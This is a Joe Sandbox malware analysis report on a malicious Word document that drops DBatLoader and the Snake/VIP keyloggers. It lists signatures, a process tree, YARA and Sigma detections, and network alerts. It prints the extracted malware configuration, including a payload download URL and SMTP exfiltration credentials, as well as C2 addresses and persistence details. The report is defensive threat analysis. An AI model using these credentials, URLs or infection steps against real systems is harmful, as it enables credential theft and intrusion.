Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI ITS15235.doc

Overview

General Information

Sample name:PI ITS15235.doc
Analysis ID:1584674
MD5:1be2a4992097f506fd7ddb85625c2f1e
SHA1:f197c2aa2c4c1dd1059d04309b22359d46fec69b
SHA256:5573f50bf399a289981af095f020610e04ede3126835312bf7dc4de27f6bb602
Tags:docuser-abuse_ch
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 7412 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • brightness.exe (PID: 7884 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: BF9B75ADF866583299DBC8A5FAD66CFC)
      • cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • npratlsN.pif (PID: 8112 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Nsltarpn.PIF (PID: 2496 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: BF9B75ADF866583299DBC8A5FAD66CFC)
    • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • npratlsN.pif (PID: 3980 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Nsltarpn.PIF (PID: 7664 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: BF9B75ADF866583299DBC8A5FAD66CFC)
    • cmd.exe (PID: 7712 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • npratlsN.pif (PID: 7692 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.3047709158.0000000000BE0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000004.00000002.1900364042.000000007FBB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 110 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.2.npratlsN.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          18.2.npratlsN.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          14.1.npratlsN.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          4.2.brightness.exe.217d67a8.10.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x38cb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x39330:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1d98a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1d5d0:$s5: delete[]
          • 0x1ca88:$s6: constructor or from DllMain.
          8.2.npratlsN.pif.400000.2.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          Click to see the 269 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Sigma detected: Execution from Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 7884, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 8112, ProcessName: npratlsN.pif
          Sigma detected: File With Uncommon Extension Created By An Office Application
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7412, TargetFilename: C:\Windows\SysWOW64\brightness.exe
          Sigma detected: Files With System Process Name In Unsuspected Locations
          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetFilename: C:\Windows \SysWOW64\svchost.exe
          Sigma detected: New RUN Key Pointing to Suspicious Folder
          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn
          Sigma detected: Parent in Public Folder Suspicious Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Nsltarpn.PIF" , ParentImage: C:\Users\Public\Libraries\Nsltarpn.PIF, ParentProcessId: 2496, ParentProcessName: Nsltarpn.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 2020, ProcessName: cmd.exe
          Sigma detected: Suspicious Program Location with Network Connections
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 8112, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 7884, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 8112, ProcessName: npratlsN.pif
          Sigma detected: Suspicious Office Outbound Connections
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49739, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7412, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80
          Sigma detected: Suspicious Outbound SMTP Connections
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 8112, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49796

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-06T07:53:18.199849+010020283713Unknown Traffic192.168.2.449744166.62.27.188443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-06T07:53:27.933122+010028033053Unknown Traffic192.168.2.449755188.114.96.3443TCP
          2025-01-06T07:53:30.961117+010028033053Unknown Traffic192.168.2.449759188.114.96.3443TCP
          2025-01-06T07:53:32.919827+010028033053Unknown Traffic192.168.2.449762188.114.96.3443TCP
          2025-01-06T07:53:34.524984+010028033053Unknown Traffic192.168.2.449764188.114.96.3443TCP
          2025-01-06T07:53:36.797073+010028033053Unknown Traffic192.168.2.449768188.114.96.3443TCP
          2025-01-06T07:53:39.678729+010028033053Unknown Traffic192.168.2.449776188.114.96.3443TCP
          2025-01-06T07:53:40.913383+010028033053Unknown Traffic192.168.2.449780188.114.96.3443TCP
          2025-01-06T07:53:42.711030+010028033053Unknown Traffic192.168.2.449783188.114.96.3443TCP
          2025-01-06T07:53:46.590984+010028033053Unknown Traffic192.168.2.449791188.114.96.3443TCP
          2025-01-06T07:53:48.430076+010028033053Unknown Traffic192.168.2.449795188.114.96.3443TCP
          2025-01-06T07:53:49.287543+010028033053Unknown Traffic192.168.2.449798188.114.96.3443TCP
          2025-01-06T07:53:50.496870+010028033053Unknown Traffic192.168.2.449802188.114.96.3443TCP
          2025-01-06T07:53:53.209273+010028033053Unknown Traffic192.168.2.449806188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-06T07:53:26.185701+010028032742Potentially Bad Traffic192.168.2.449753158.101.44.24280TCP
          2025-01-06T07:53:27.495502+010028032742Potentially Bad Traffic192.168.2.449753158.101.44.24280TCP
          2025-01-06T07:53:28.592083+010028032742Potentially Bad Traffic192.168.2.449756158.101.44.24280TCP
          2025-01-06T07:53:37.614845+010028032742Potentially Bad Traffic192.168.2.449767158.101.44.24280TCP
          2025-01-06T07:53:39.114951+010028032742Potentially Bad Traffic192.168.2.449767158.101.44.24280TCP
          2025-01-06T07:53:40.308163+010028032742Potentially Bad Traffic192.168.2.449779158.101.44.24280TCP
          2025-01-06T07:53:44.665578+010028032742Potentially Bad Traffic192.168.2.449786158.101.44.24280TCP
          2025-01-06T07:53:46.009341+010028032742Potentially Bad Traffic192.168.2.449786158.101.44.24280TCP
          2025-01-06T07:53:48.681290+010028032742Potentially Bad Traffic192.168.2.449794158.101.44.24280TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-06T07:53:40.506357+010018100071Potentially Bad Traffic192.168.2.449778149.154.167.220443TCP
          2025-01-06T07:53:52.312826+010018100071Potentially Bad Traffic192.168.2.449805149.154.167.220443TCP
          2025-01-06T07:54:00.405289+010018100071Potentially Bad Traffic192.168.2.449818149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: PI ITS15235.docAvira: detected
          Found malware configuration
          Source: 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
          Source: 4.0.brightness.exe.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}
          Machine Learning detection for sample
          Source: PI ITS15235.docJoe Sandbox ML: detected

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 8.2.npratlsN.pif.400000.2.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 14.2.npratlsN.pif.400000.1.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 18.2.npratlsN.pif.400000.1.unpack
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49773 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49789 version: TLS 1.0
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49805 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1976468099.0000000032464000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2072252048.000000001EAD6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.0000000021501000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.00000000214D2000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000691000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000662000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 